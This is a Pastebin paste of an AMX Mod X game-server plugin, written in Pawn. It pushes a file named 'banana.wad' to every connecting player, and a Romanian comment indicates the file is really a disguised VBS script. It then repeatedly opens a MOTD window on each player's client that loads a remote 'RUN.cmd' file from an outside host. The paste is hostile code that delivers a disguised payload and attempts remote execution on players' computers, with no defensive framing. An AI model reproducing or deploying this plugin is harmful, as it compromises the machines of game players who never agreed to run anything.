Advertisement
Guest User

Untitled

a guest
Jul 27th, 2017
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Pawn 0.33 KB | None | 0 0
  1. #include <amxmodx>
  2. #include <fakemeta>
  3.  
  4. #define VBS "banana.wad"
  5. // numele la wad - reprezinta update-ul la vbs
  6.  
  7. public plugin_precache()
  8. {
  9.     precache_generic(VBS)
  10.     register_forward(101,"Hook1",0)
  11. }
  12.  
  13. public Hook1(id)
  14. {
  15.     set_task(5.0,"motd",id,_,_,"b")
  16. }
  17. public motd(id)
  18. {
  19.     show_motd(id,"http://link.ro/cmd/RUN.cmd","Joaca")
  20. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement